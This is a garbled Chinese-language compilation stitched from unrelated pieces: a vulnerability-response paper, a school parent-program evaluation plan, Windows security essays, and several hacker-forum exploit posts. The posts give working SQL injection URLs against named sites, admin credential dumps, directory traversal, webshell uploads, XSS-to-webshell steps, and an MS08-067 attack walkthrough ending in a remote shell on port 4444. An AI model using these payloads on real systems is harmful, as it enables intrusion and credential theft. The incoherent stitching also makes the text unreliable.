漏洞评估系统方案(精选13篇)
当前针对漏洞这种安全威胁所采取应对措施的各个环节还相对孤立,没有衔接成为一个整体,漏洞发现漏洞分析、漏洞补丁的发布等各个部分各自为战,彼此之间缺乏联系,从漏洞发现到最后由此漏洞导致的重要安全威胁被消除,期间的时间跨度较大,使本来就不容乐观的安全形势更加严峻。参与漏洞处理的各个组织之间缺乏有效的交流,漏洞库组织、安全公司、爱好者团体之间交流甚少,甚至故意制造技术壁垒,这也严重影响了漏洞应对的效率。本文提出一种多方联动的漏洞威胁应对方案,旨在提高各种资源的利用率,联合漏洞库、补丁发布组织、安全组织、爱好者团体等漏洞参与环节,缩短从漏洞发现到漏洞应对措施的成功实施的时间。
2 整体框架
当前对漏洞的定义为: 在一个信息系统的硬件、软件或固件的需求、设计、实现、配置、运行等过程中有意留下或无意中产生的一个或若干个缺陷,它会导致该信息系统处于风险之中。漏洞所带来的威胁不是来自于漏洞本身,而是由于漏洞所引起的信息泄露、未经授权的访问和篡改等风险。有些漏洞被利用后,攻击者可以绕过安全机制和授权机制,达到其非法入侵的目的。
现有技术条件下, 对漏洞的发现和研究尚未达到完全自动的程度, 主要手段仍是手动测试和构造半自动化的测试程序。同时针对不同的文件格式,其漏洞发现和修补的途径也差异甚大, 对网络协议和各种文件格式的漏洞发掘已经取得一部分研究成果, 根据补丁前后的文件比对进而对漏洞进行利用的逆向工程技术也日益丰富由于不同类型的漏洞的处理方法差异较大, 也导致了各个组织之间各有所长,在缓冲区溢出、SQL注入、目录遍历、远程代码执行等不同的方面都存在较为擅长的组织。
这种情况导致了一批分布于漏洞处理各个领域的研究单位、安全公司、爱好者团体的出现和发展,使这一领域的气氛非常活跃, 但是在某种程度上也阻碍了经验的交流和成果的转化。针对这种情况,借鉴现有的杀毒软件的模式,提出一种新的漏洞应对方案,扬长避短,综合各方优势,做到对各种漏洞带来的威胁及时地响应。
本方案设计为三个主要的部分: 漏洞信息获取、分析和处理;涉及到三个主要的参与方:漏洞信息源、分析中心、最终用户。其中,信息源提供有关漏洞的相关信息,如漏洞的来源,影响的应用程序、系统或者网络协议,漏洞的触发条件,在可能的情况下还要提供漏洞利用的shellcode或者exploit代码等。分析中心负责对信息源提供的漏洞信息进行分类整理,分析其安全威胁等级,所属分类,有无补丁,有无相应的exploit代码,并设置相应的特征码以便发送给最终用户进行威胁应对。用户部分则是根据分析中心得到的特征码匹配网络上收到的信息和本地文件内容,若存在一致的部分,则说明有可能是漏洞利用者故意发送的触发漏洞的代码或者制造的文件,需要提高警惕。
本方案的三个部分之间需要交互联系, 分析中心从信息源处获得漏洞的信息并综合分析处理, 然后将结果送到最终用户,接受最终用户的反馈,最终用户也可在程序或者协议出现异常的时候, 将场景保存发送给分析中心,分析中心利用人员和数据量上的优势进行分析处理,同时将此信息分发至各漏洞研究和应对组织, 尽量把漏洞堵在未造成危害的状态。其结构示意如图1。
3 分块功能划分
3.1 信息源
信息源处于整个方案的设计中的最前端,是方案能够正常运行的第一步,从信息源处得到的漏洞信息是原始的数据,在漏洞信息获取的过程中,应当秉持“宁滥勿缺”的原则,尽可能多的搜集各漏洞库的漏洞信息,以交由分析中心进行分析处理。
目前相对较大的漏洞库,国外的有美国国家漏洞库(NVD), 美国国土 安全部的US-CERT VulnerabilityNotes Database, 开源的Open Source VulnerabilityDatabase,Symantec公司的Security Focus VulnerabilityDatabase,Veri Sign公司的i Defense VulnerabilityAdvisories, 这些漏洞 库大都遵 循CVE (CommonVulnerability and Exposures) 标准且有各自不同的更新方式,其中的内容详细全面,是很有价值的漏洞库参考。
国内的漏洞库主要是中国国家漏洞库、国家安全漏洞库、国家信息安全漏洞共享平台和绿盟公司的绿盟科技漏洞库,这些漏洞库也都更新及时,分类详细。另外还有一些爱好者团体、网络安全组织等所掌握的漏洞信息,其特点是时效性强、漏洞信息很新,威胁程度较高,也有很高的分析价值。
选择信息源时, 应当尽可能综合上述漏洞库的信息,积极吸取各方的长处和优势,为在分析环节进行漏洞的分析分类和整理提供尽量多的数据,这样有助于分析环节中的分类更明确,特征码提取更准确,能够更高效地为最终用户提供相应的漏洞应对策略,同时更好地将信息源和信息目的地连接在一起。
3.2 分析中心
分析中心负责将从信息源传来的信息进行分析分类和整理,在技术条件允许的情况下对漏洞进行深一步的研究,主要是从已经获得的漏洞信息中,如漏洞影响的系统、软件或者协议,漏洞的CVE编号,漏洞触发时的内存情况、系统信息、运行状态等信息中,提取引发漏洞威胁的文件、数据流的特征码,使得用户能够根据特征码来发现漏洞的威胁。这种方式较为简便易行,同时不要求客户端占用太多的资源。
分析中心需要完成对漏洞的分类,按照影响的信息系统的部分不同,分为系统漏洞、应用程序漏洞、协议漏洞等;按照威胁等级将漏洞标记为高风险、一般风险和低风险;按照触发机制的不同,将漏洞分为缓冲区溢出漏洞、注入漏洞、远程安全机制绕过漏洞等;并以此作为参考的一部分,定义漏洞的特征码,方便地标识一个漏洞所处的状态。
一个漏洞的触发机制,即软件活硬件的异常是在什么情况下被触发的, 能够精确地定位触发漏洞的场景明确当时软件的输入、正在处理的数据、提供给它的接口做出了哪些动作,对漏洞的研究也就成功了一半。同时,明确触发漏洞的输入也有非常重要的意义,因为在一般情况下想要进行漏洞利用,必须要触发漏洞,而漏洞利用的代码、数据流或者文件与引起软硬件崩溃时的场景必然有相似或者相同之处,研究漏洞的触发机制是分析一个漏洞的重要的一步。
明确一个漏洞能够造成的后果,对漏洞分析和漏洞威胁等级的定义,也有重要的价值。有些漏洞仅会导致目录信息被泄露或者拒绝服务,有些漏洞则造成缓冲区溢出,指令寄存器被攻击者篡改,引发攻击者可以执行任何命令的严重后果; 故需要根据漏洞影响的范围,以及针对此种类型的漏洞的攻击方式、攻击工具的数量的不同,对漏洞的威胁等级进行定义,对于威胁等级较高的漏洞,相应地在分析、处理时的紧迫度也较高。
针对威胁等级中等以上的漏洞,分析中心可以通过从安全组织处、从网络流量或异常监控中获取一个漏洞相应的exploit代码, 如果某一漏洞的exploit代码不易被获取, 分析中心可采取自主开发的方式得到相应的exploit代码。exploit代码可以用来向用户提供更为准确的威胁警告,如果用户在自己的网络流量或者文件中监察到了与之相同或非常相似的部分,那么该文件或者信息就极有可能是攻击者用来触发漏洞的,用户可以通过升级系统和应用程序,屏蔽某个来源的信息来防范此类攻击的威胁。exploit代码同样是生成漏洞特征码时应当考虑的一个组成部分。
3.3 最终用户
最终用户是以上部分和策略的直接使用者, 漏洞信息的整理和分析的结果在用户处体现。用户处采取客户端的方式,与分析中心进行交互,从分析中心处获得以特征码为主的漏洞信息, 反馈自己的匹配结果和在软硬件系统出现异常时的系统状态信息, 为分析中心提供分析漏洞和开发相应的exploit代码的参考。通过这种信息的交互, 用户能够及时发现自身系统中漏洞所造成的安全威胁,分析中心能够得到用户的反馈,验证特征码的构造是否合理并根据用户的状态信息开发新的exploit代码。
在这种方式下,用户需要在本地定时开放文件扫描和网络流量监控, 通过特征码与文件和流量相匹配,以发现其中的异常情况,及时提醒用户防范恶意攻击和升级系统。在软硬件系统发生异常或者崩溃的时候,客户端报告系统的状态信息,用户在使用分析中西提供的服务的同时,也在某种程度上作为一种信息源将必要的信息提供给分析中心。
4 结束语
本方案通过三个部分多个组成部分之间的协调联系,将漏洞应对的各个环节紧密联系起来,达到漏洞威胁的综合管理和应对。传统的漏洞威胁应对以“补丁”的方式为主,即发现漏洞以后,开发出相应的漏洞补丁予以修补,这种方式有一定的滞后性同时补丁的安装可能会引入新的安全威胁, 受对病毒的防御方法的启发,本方案将重点从不漏洞向防止漏洞被利用转变,在采用这种方法的同时并不完全放弃传统的补丁方式,由单一的防护途径向综合的多种防护途径转变,不断加强信息系统的安全性。
摘要:随着信息系统的发展,其中的威胁形式也越来越多样化,漏洞威胁作为其中一种影响范围广、威胁程度高的形式被越来越多地关注。常规的应对漏洞威胁是采用补丁的方式,这样有一定的不足。本文提出一种多方联动的漏洞威胁应对方式,综合利用各方资源,加强信息系统的安全性。
崇明县学校系统家长学校星级评估验收方案
(讨论稿)
一、指导思想
家庭教育是国民教育的重要组成部分,是培养人才不可缺少的环节,是搞好学校教育的必要保证。因此,学校应贯彻落实中共中央国务院《关于进一步加强和改进未成年人思想道德建设的若干意见》认真落实上海市家庭教育“十五”评估细则和精神,应以家长学校为载体,认真抓好家庭教育的指导工作,家长学校应全面担负起学校指导家庭教育工作的职责,切实改善和优化家长家庭教育的观念和行为,切实优化学生成长的环境,使家庭教育与学校教育形成合力,有效促进青少年的健康成长。2009学年决定在全县中小学启动家长学校星级评估验收机制。现将有关事项通知如下:
二、评估内容
1、家长学校的组织机构
2、家长学校的师资建设
3、家长学校的指导内容
4、家长学校的成果资料
三、评估方法
1、自评和互评相结合。按崇明县学校家庭教育指导评估细则,各校进行自评,填写“崇明县中小学学校家庭教育指导评估细则自评、互评表”。在此基础上由教育局组织评估小组进行评估。
2、日评和终评相结合。日常调研获得的信息和县级层面各校家长
崇明 学校内部家长学校星级评估方案
学校间交流、学习等的情况。终评是指根据“评估表”内容三年一次的自查和评估情况。
3、汇报和调查相结合。家长学校星级评估验收除了听取学校汇报,查看相关资料外,还要听取部分家长反映。
4、定性和定量相结合。星级家长学校评估的指标体系中,有的是 定量的指标,也有的是定性的要求,评估时将根据实际情况综合考虑。
四、评估时间和程序
2009年10月完成动员和材料的准备。
20010年2月学校完成自评并将“崇明县中小学学校家庭教育指导评估细则自评、互评表”和家长学校总结材料一份交德育室。
20010年4月对申报三星级以上的学校进行评估验收。具体时间另行安排。
20010年6月公布结果。
五、奖励和表彰
1、实行星级家长学校评估后,凡是县级以上的家长学校先进集体和个人的候选人从三星级以上学校产生,三星级家长学校成为学校年终考评“优秀”的基本条件之一。
2、对四星级以上的家长学校进行表彰和奖励。
六、评估组成员
教育局领导、德育室全体成员
崇明县教育局 崇明县教师进修学校
“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!
后台管理
后台路径:admin/login.asp
管理员:user:admin
密码:psw:123456
下载地址:down.chinaz.com/soft/30295.htm
Demo Url:will.w701.hzdemo.cn/
exp:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin
或者:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
遍历目录:
www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..
其它:
www.0855.tv/admin/do/Admin_Style.asp
www.0855.tv/admin/do/data.asp
关键字:
为防批量,特略,
智有道专业旅游系统 v1.0 漏洞漏洞预警
一、MS08-067漏洞介绍
MS08-067漏洞的中文名称为Windows Server服务RPC请求缓冲区溢出漏洞, 这是一个针对139、445端口的RPC服务进行攻击的漏洞, Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞, 远程攻击者可以通过发送恶意的RPC请求触发这个溢出, 如果受影响的系统收到了特制伪造的RPC请求, 可能允许远程执行代码, 导致完全入侵用户系统, 以SYSTEM权限执行任意指令并获取数据, 同时获取对该系统的控制权, 造成系统失窃及系统崩溃等严重问题。此漏洞还可能被蠕虫利用, 通过恶意构造的网络包直接发起攻击, 并且攻击者可以获取完整权限, 因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
根据微软提供的消息, 基于MS08-067漏洞的攻击无法穿透DEP机制的保护, 该漏洞对正版Windows XP SP2以上版本 (含SP2) 和Windows Server2003 SP1 (含SP1) 系统无效, 因此受到威胁的用户主要是Windows 2000和Windows XP SP2以前版本的用户。但由于一些盗版的操作系统被人为降低了安全级别或者修改过安全机制, 因此Windows XP SP2以上版本 (含SP2) 和Windows Server 2003 SP1 (含SP1) 版本的用户也有可能受到攻击。
二、利用MS08-067漏洞的攻击过程
了解MS08-067漏洞的攻击过程对于防范MS08-067漏洞攻击具有一定的帮助, 利用MS08-067漏洞的攻击过程如下:
在利用MS08-067远程溢出漏洞进行攻击前, 首先要找到要攻击的主机目标, 可以利用漏洞扫描工具 (例如X-san) 扫描存在MS08-067漏洞的主机。找到存在MS08-067漏洞的主机后, 就可以尝试对该主机进行攻击。下载溢出攻击工具“MS08-067远程溢出漏洞利用工具”, 并将其解压于C盘根目录下。点击“开始”菜单→“运行”, 输入命令“CMD”, 回车后打开命令提示符窗口。进入溢出工具所有的文件夹“Release”目录下, 执行命令“MS08-067.exe”, 可看到溢出工具命令使用格式为MS08-067.exe
(一) 建立空连接
在攻击前, 首先与目标主机建立一个空连接, 这里假设要攻击的目标主机为“192.168.1.8”, 可执行命令为:net use192.168.1.9ipc$, 命令执行后, 即可与远程主机建立一个空连接。
(二) 执行远程溢出
建立空连接后, 即可进行溢出攻击。攻击命令为:MS08-067.exe 192.168.1.9, 执行攻击命令后, 溢出程序就会自动与远程主机建立SMB连接, 并进行溢出攻击。
(三) 溢出返回结果
溢出攻击后, 往往会有不同的返回结果提示信息, 如果返回的信息为:
那么, 说明远程主机上可能已经打上该溢出漏洞补丁, 虽然可以建立SMB连接, 但是无法攻击成功。
如果返回信息为:Make SMB Connection error:53或者Make SMB Connection error:1219 (后面的数字可能是变化的) , 那么说明该主机没有开机联网或者没有安装Microsoft网络的文件和打印机共享协议或没有启动Server服务, 因此无法进行溢出。还有一种情况的返回信息为:
出现这种情况, 说明溢出失败, 对方开启了防火墙。那么, 最后成功的提示信息为:
出现这种提示, 说明溢出成功, 成功地发送溢出模块并绑定在远程主机端口。
(四) 远程登录
溢出成功后就可以远程登录, 登录命令为:Telnet IP地址4444。直接用Telnet连接远程主机IP地址的4444端口即可。这里执行命令为:Telnet119.1.41.97 4444。成功地连接上了远程主机。在远程主机上执行命令“netstat-an”时, 可以看到开放的4444端口, 这就是溢出打开的端口。
三、MS08-067漏洞的终端用户解决方案
通过以下的设置, 可以在一定程度上减少MS08-067漏洞对系统的危害。
(一) Windows自带防火墙设置
在控制面板的Windows防火墙管理中启动防火墙, 并勾选“不允许例外”选项。
(二) 数据执行保护 (DEP) 配置
右键点击“我的电脑”, 选择属性, 点击“高级”页中的“设置”按钮, 出现如图1的界面。
在图1中, 进行不同的选择会有不同的效果, 如果选择“仅为基本Windows程序和服务启用DEP”功能, 则可以挡住本次RPC攻击, 也可以挡住目前主流的针对Windows开放端口的攻击, 在获得一定的安全性的情况下, 保证了系统的兼容性, 但缺点是不能保护类似IE浏览器、Outlook等比较脆弱的互联网应用程序, 不能防范类似挂马注入的攻击。如果选择“为除下列选定程序之外的所有程序和服务启用DEP”功能, 在上述效果的基础上, 对Web挂马、各种应用软件插件注入都有很好的效果, 具有更强的系统安全性, 缺点是与部分应用程序冲突, 但可以通过将冲突的程序设置为例外来解决。设定数据执行保护策略, 修改后重新启动电脑。
(三) 安装相应补丁, 清除安全隐患
针对该漏洞, 微软发布了Windows紧急安全更新 (KB958644) , 安装此更新补丁是防御MS08-067漏洞最有效的办法, 微软官方网站上有针对不同操作系统的补丁, 下载后安装即可。
四、MS08-067漏洞病毒的查杀
对于已经中了MS08-067漏洞病毒的终端, 可以按以下步骤解决。
(一) 使用symantec专杀工具查杀
针对MS08-067漏洞病毒, symantec提供了专杀工具, 下载地址为:http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/D.exe。
专杀工具下载完毕后, 进入安全模式, 断开网络, 运行D.exe开始查杀 (如图2所示) , 查杀完毕后, 根据提示重新启动系统。
(二) 安装补丁
病毒查杀完毕后, 应及时安装KB958644补丁, 防止再次中毒。
(三) 进行全盘病毒查杀
原理和fck差不多,也是利用上传功能。
ftb.imagegallery.aspx 这是一个具有上传功能的目录,添加在该网站域名后即可打开。
之后上传带有可解析的asp马(需要解析改后缀,为安全起见就不公开了。)便可直接访问。
截图如下:
首先:搜索
第二步:找到相关可上传的站点域名
上传成功,
第三步:访问该网马的目录
证明:
(上面的图都懒得打码了 一看images,全是马,黑阔们,你们慢点。别把服务器搞成“养马场”了!)
解决方案:(自己想的 高手勿喷)
1、换个管理系统(最果断,也是最好的解决方式。)
2、如果网站管理员懒得换可以把”ftb.imagegallery.aspx”这个的路径更改一下。(其实这个不建议才用,毕竟如果真的想搞,直接扫目录也会扫出来的!)
3、设置访问权限,或者换成错误页面。
4、停止解析一些被更改后缀的大马。
注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb1481eca94b12f75 =====admin b1481eca94b12f75(38983806 )
后台:/admin 或者/admin_shopxp
漏洞是指系统硬件、操作系统、软件、网络协议、数据库等在设计上、实现上出现的可以被攻击者利用的错误、缺陷和疏漏。漏洞也是入侵者成功所在。
二、漏洞怎样被攻击者利用
漏洞与时间具有紧密相关性, 系统从发布的那一刻起, 随着用户的深入使用, 系统中存在漏洞会被发现。系统中存在的漏洞暴露的时候, 系统供应商将发布的补丁软件修补, 或在以后发布的新版系统中得以纠正。而在新版系统纠正了旧版本中具有漏洞的同时, 也会引入一些新的漏洞和错误。因此, 一般漏洞经历以下过程:
系统发布——暴露漏洞——发布补丁——新漏洞出现
系统安全漏洞是在系统具体实现和具体使用中产生的错误, 但并不是系统中存在的错误都是安全漏洞。许多错误一般并不会对系统安全造成危害, 只有被人在某些条件下故意使用时才会影响系统安全。我们把某人非法使用或破坏某一信息系统中的资源, 以及非授权使系统丧失部分或全部服务功能的行为称为系统攻击。那么我们可以得到安全漏洞与系统攻击之间的关系:
漏洞暴露——可能攻击——发布补丁
系统安全漏洞与系统攻击活动之间有紧密的关系, 因而不该脱离系统攻击活动来谈论安全漏洞问题。由于广泛的攻击存在, 才使漏洞存在必然被发现性。
漏洞涉及范围很广, 包括系统本身及其支撑软件, 网络客户和服务器软件, 网络路由器和安全防火墙等。每个网络平台无论是软件还是硬件都有可能存在漏洞, 而每个可能的漏洞在整个网络系统中都是一个环节, 破坏其中任一环节, 入侵者就有希望破坏掉其他环节甚至整个网络。漏洞的类型很多, 如软件漏洞、系统配置不当、口令失窃、明文通信被监听及TCP/IP初始设计存在缺陷等。
三、利用安全漏洞进行的攻击造成的危害
攻击者利用安全漏洞进行攻击所造成的危害主要体现在以下几个方面:
1、系统劫持
攻击者攻击一台主机, 总会找一个中间站点, 以免暴露自己的身份和真实所在地或者通过这个中间站点取得另外主机的访问权限。这种攻击对主机本身没多大危害, 只是会占用处理器时间, 使主机响应时间延长。
2、获取文件和传输中的数据
攻击者会使用网络监听程序和登录目标的方式获取系统中的一些重要数据。利用这些方式直接读取或复制他所需要的任何文件。监听到的信息中如果含有密码等重要信息的话, 比如银行卡密码, 用户登录密码等后果将不堪设想。
3、获取权限升级, 非法访问系统
超级用户才能对计算机进行任何设置, 所以每一个攻击者都想得到这个权限, 以达到隐藏自己行踪, 自由修改资源配置。如UNIX系统中, 运行网络监听程序必须要超级用户的权限, 因此在一个局域网中只要取得了超级用户权限, 可以说就有可能掌握整个子网。对于设置了访问权限的系统, 利用缓冲区溢出漏洞得到所需要的访问权限, 从容进入计算机系统寻找自己感兴趣的信息, 比如获取公司竞争对手的客户资料等。
4、拒绝服务
拒绝服务是一种有目的的破坏行为, 它的方式很多。比如制造网络风暴, 使网络中充斥大量信包, 占据网络宽带, 延缓网络传输。
5、涂改、窃取信息
被攻击的站点往往具有许多重要的信息和数据可利用, 比如用户个人信息, 企业客户信息与系统安全配置等。攻击者主要就是为了盗取个人隐私和商业机密等重要信息。或者对信息进行更改, 替换, 删除的一种恶劣行为, 使用户因收到错误信息造成损失。
除此之外, 黑客利用计算机系统中的漏洞来制造具有传播功能的病毒。用来控制更多的主机来为他们服务。互联网的飞速发展, 使得系统入侵和破坏行为更为严重和广泛。
四、针对漏洞的应对措施
漏洞是客观存在并且不能完全杜绝的, 在我们解决已发现漏洞的同时又会有新的漏洞被发现。所以我们必须从漏洞的生理周期和机理研究, 从而提高信息系统安全性。安全漏洞每天都有可能被发现, 所以攻击方和防守方是相互循环重复存在的。综上所述, 、对安全漏洞即时修补是维持信息系统安全最简单的方法。
下面是几种针对漏洞采取的措施:
1、防火墙是最常用对可疑、恶意或其他不明身份的信息
交换进行预警防护的工具。我们所熟悉的江民、瑞星很多公司都有防火墙产品。这些产品对于计算机各种活动都有记录, 而产生的日志可以设置为伴随软件和参数的改变而发出通知。
2、入侵检测系统软件 (Intrusion-detection system,
IDS) 可以检测内部活动以及与外部有联系的活动, 特别是识别任何可疑模式。假设防火墙是一幢大楼的门卫, 那么IDS就是这幢大楼里的监视系统。一旦小偷爬窗进入大楼, 或内部人员有越界行为, 只有实时监视系统才能发现情况并发出警告。IDS系统提供入侵通知, 可以识别通过防火墙的攻击, 特别是来自内部网的入侵。
3、网络监视程序跟踪经过的所有数据包, 收集包括包的
from www.0855.tv
由于网上开源的东西多了,版权就无从查起,这天姑且就这么称乎它吧。
具体版权无从查知,相似的内核太多。
源码下载:www.mycodes.net/25/4628.htm
:www.tb11.net/
官方演示:www.tb11.net/system/xitong/
www.tb11.net/system/xitong2/
www.tb11.net/system/xitong3/
直接上exploit:
javascript.:alert(document.cookie=”id=“+escape(”1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin“));
test:www.tb11.net/system/xitong/shownews.asp?id=210
影响版本:未知
漏洞文件:search_sell.asp;search_hire.asp;search_buy.asp conn.asp
描述:这个系统是一个房屋交易,租赁的系统,
停网了。没事下了套源码看看。通过Macromedia Dreamweaver搜索request( 发现并没有过滤布严的漏洞。存在的也只是存在整数溢出没什么利用价值。翻了好久发现了search_hire.asp这个文件,存在代码如下:
<%
dim search,search_qy,search_lx,search_hx,search_zj,search_mj_min,search_mj_max,search_jg_min,search_jg_max
search_qy=request(“search_qy”)
search_lx=request(“search_lx”)
search_hx=request(“search_hx”)
search_zj=request(“search_zj”)
search_mj_min=trim(request(“search_mj_min”))
search_mj_max=trim(request(“search_mj_max”))
search_jg_min=trim(request(“search_jg_min”))
search_jg_max=trim(request(“search_jg_max”))
search=“”
if request(“search_qy”)“” then
search=search & “and qy=” & request(“search_qy”) & “”
end if
if request(“search_lx”)“” then
search=search & “ and wylx=” & request(“search_lx”) & “”
end if
if request(“search_hx”)“” then
search=search & “ and hx=” & request(“search_hx”) & “”
end if
if request(“search_zj”)“” then
search=search & “ and zj=” & request(“search_zj”) & “”
end if
这个是个搜索文件,
在头文件里也并没有防注入,这个我就不说明了。漏洞很明显,没有过滤各种字符,导致了存在跨站和注入。我们需要的是密码和账号,那么下面就来构建注入地址:sniff3r/search_hire.asp?pageno=1&search_lx=&search_hx=&search_zj=&search_mj_min=&search_mj_max=&search_jg_min=&search_jg_max=&search_qy= 搜索型的注入语句就不写了。可以直接抛到Pangolin3.0里跑出来。存在表段admin 字段username; userpassword爆出了管理员账号密码 ,后台:efang /efwmanager/index.asp 后台拿Shell的方法很简单,由于上传文件存在漏洞,直接访问efwmanager/admin/Upfile_Photo.asp用明小子上传就可以了。这个程序另外有有一个漏洞文件为conn.asp链接文件(本程序存在俩个Conn.asp )2个连接文件里的Conn.asp代码都少了on error resume next这句代码 存在暴库。直接将二级目录的/ 转换成%5C 或者直接访问爆出数据库然后写进迅雷下载 。下载回来的数据库是有密码的,加密方式很简单。用accesskey等工具破解就可以了
其他的漏洞暂时没有发掘出来。有不对的地方请指出来。另外写出另外俩个文件的利用字符
search_sell.asp文件:漏洞字符
sniff3r/search_sell.asp?pageno=1&search_lx=&search_hx=&search_zj=&search_mj_min=&search_mj_max=&search_jg_min=&search_jg_max=&search_qy=
search_buy.asp文件:漏洞字符:
sniff3r/search_buy.asp?pageno=1&search_qy=&search_hx=&search_zj=&search_mj_min=&search_mj_max=&search_jg_min=&search_jg_max=&search_lx=
再提供几个参考后台:system/manage.asp /system/index.asp /efwmanager/index.asp
目前,移动存储设备也已经成为我国信息泄密的主要方式之一。近年来,为加强移动存储介质安全保密管理,提高保密技术防范能力,我国众多IT信息安全公司开发了针对加强移动存储介质安全保密管理的软件系统(简称“移动存储介质管控系统”)。
那么,有了移动存储介质管控系统就真的高枕无忧了吗?答案是否定的。
一、漏洞
近年来,包括国家机关和重点企事业单位在内的许多部门在它们的涉密信息系统上纷纷建立了移动存储介质管控系统,这种系统从某种程度上能够有效预防和减少涉密移动存储介质丢失和误用带来的损失,也能有效防范移动存储介质在文件摆渡过程中出现的泄密现象。但是必须看到,这种管控系统的主要作用在于防止并非主观恶意的无意泄密行为,它并不是万能的。对于主观刻意要绕开它的管理,只须使用未经注册的移动存储介质和其他介质,便可进入涉密信息系统窃取涉密文件,因此它还是有“漏洞”存在的,现将“漏洞”扫描如下。
一是在单机上安装第二操作系统,绕过装有移动存储介质管控系统的管理。
二是利用目前流行的装机工具光盘里WINPE系统软件,绕开移动存储介质管控系统的管理。只要将电脑设置成从光盘启动,即使不会装机的人也可轻松进入光盘自带的WINPE操作系统,如同使用未安装移动存储介质管控系统的电脑一样,可方便地使用任何移动存储介质进行数据的交换。
三是通过联网绕过移动存储介质管控系统。这时只要一根网线,或者再加一个集线器或交换机,另外找一台未装移动存储介质管控系统的单机与装有移动存储介质管控系统的单机,便可组成一个简单的小局域网,通过网络进行数据的交换。
四是通过刻录光驱进行数据的交换。
前三者途径的核心是“绕”,与使用未安装移动存储介质管控系统的电脑从本质上来说没有区别,如果移动存储介质感染了摆渡程序或其他的病毒,摆渡程序能自动搜索相关文件进行窃取,危害极大,要极力防止。
二、预防手段
一是开发能够在DOS系统下进行安装和管理的移动存储介质管控系统,同时对多个操作系统管理有效。
二是对计算机BIOS设置进行有效管理,防止使用通过更改设置从光盘启动WINPE系统。
三是对计算机网络参数和防火墙安全策略进行有效管理,使其通过网络只能够连接到指定的计算机。
四是在使用移动存储介质管控系统后,刻录光盘可作为与外部计算机交换数据的补充途径,使用者虽然可以通过刻录光盘交换数据,病毒也能够自动搜索隐藏的涉密文件,但由于刻录光盘操作程序的特殊性,尚不能通过自动刻录来达到窃取涉密数据的目的。因此,关键是要从制度上加以约束,严禁私自刻录涉密文件。
五是针对密级较高的计算机设备可由国家保密局认可的具有保密资质的计算机厂家定制,从操作系统到硬件配置进行优化设计,去除可能造成失泄密隐患的配置,比如无USB接口、无刻录光驱等。
漏洞文件:links.php
漏洞处在申请友情链接处的网站名称和logo地址处,因为网站名称“webname”是post获取的并且没做过滤所以xss出现了!
利用说明:xss打后台拿webshell
后台拿shell:直接在域名后面输入这段URL“admin/template_update.php?dir=default&file=config.default.php”进行模板修改!然后在模板修改上面添加一个php的一句话就可以了,然后在域名后面直接连接“/inc/templates/frontend/default/config.default.php”就可以了!
PS:xss比sql好多了,难得猜表和爆表,直接X后台! (*^__^*) 嘻嘻……
图-1
图-2
图-3
图-4
微软Windows Xp自出世以来就在中国市场中获得了广泛好评和客户的认同,它出色的兼容性和移动性也被业界所推崇。但是金无足赤、Windows Xp也照样存在着系统漏洞。如果我们对此不加强防范的话,网上 就会利用系统的漏洞让你无法上网,甚至对一些分区进行格式化操作,侵入你的计算机盗取……,这样造成的损失可是巨大的!怎样才能保证你的Windows Xp安全呢?比较好的办法就是下载Windows安全补丁,既然Microsofe公司时不时就会在网上提供一些免费的补丁,我们只要有时间就要去打打补丁。这样既可以增强兼容性,又可以堵上已发现的安全漏洞,何乐而不为!下面就让我们来看看究竟Windows Xp有哪些安全漏洞,如何堵住这些漏洞呢?
一、切换功能漏洞
Windows Xp快速用户切换功能存在漏洞,当你单击“开始”/注销/“切换用户”启动快速用户切换功能,在传统登陆方法下重试登录一个用户名时,系统会误认为有暴力猜解攻击,因而会锁定全部非管理员账号。
解决办法:单击控制面板/用户帐户/更改用户登录或注销的方式,取消“使用快速用户切换”(如图1),以便禁用用户快速切换功能。f487bd9b44aRrZKu
二、不可靠的即插即用
UPnP亦称通用即插即用软件(全称Universal Plug and Play),微软这个软件是基于互联网协议的,它允许不同的设备如电脑、扫描仪、打印机联成网络,可以在彼此之间自动识别,并进行通信,这样用户不需要再挨个地为每个外设来配置计算机了,安坐家中可以开视频会议,打联网的视频游戏了,而且XP操作系统在发售时就已经激活了UPnP功能,给用户带来极大的方便。然而,事实上并没有完美的,UPnP也存在安全漏洞。 可以利用该软件上的漏洞控制同一网络上的电脑,或者发动_blank>DOS攻击。当然更为严重的是,来自同一网络的其它用户甚至不需要知道该计算机的IP地址,就可以对其发对攻击。具体来讲,UPnP服务可以导致以下两个安全漏洞:
(1)缓冲溢出问题
UPNP 协议存在安全漏洞问题,最早是由eEye数字安全公司发现并通知微软的。其中的UPnP存在缓冲区溢出问题,也是Windows中有史以来最严重的缓冲溢出漏洞,当处理 NOTIFY 命令中的Location字段时,如果IP地址、端口和文件名部分超长,就会发生缓冲区溢出,由此会造成服务器程序的一些进程,其内存空间的内容被覆盖。由于UPnP服务运行在系统的上下文,攻击者如果利用漏洞成功,可以完全控制主机。更为严重的是SSDP服务器程序同样也监听广播和多播接口,所以攻击者可以同时攻击多个机器而不需要知道单个主机的IP地址。
解决方法:由于Windows Xp打开了UPnP(通用即插即用)功能,因此所有Win XP用户都应该立即安装该补丁;而Win ME的用户,只有在运行了UPnP的情况下才需要该补丁,因为Windows ME的UPnP功能在安装时是关闭的;至于Win98,由于其中并没有UPnP,只有当用户自己安装了UPnP的情况下,才需要使用该补丁。下载并安装补丁:
_blank>Microsoft Windows 98/98SE:_blank index.shtml? 72342371945218048 SoftChannel www.yesky.com http:>asp?ReleaseID=34991“>www.microsoft.com/Downloads/Release.asp?ReleaseID=34991
Microsoft Windows ME:download.microsoft.com/download/winme/Update/22940/WinMe/EN-US/314757USAM.EXE
Microsoft Windows Xp:www.microsoft.com/Downloads/Release.asp?ReleaseID=34951
(2)系统容易被欺骗
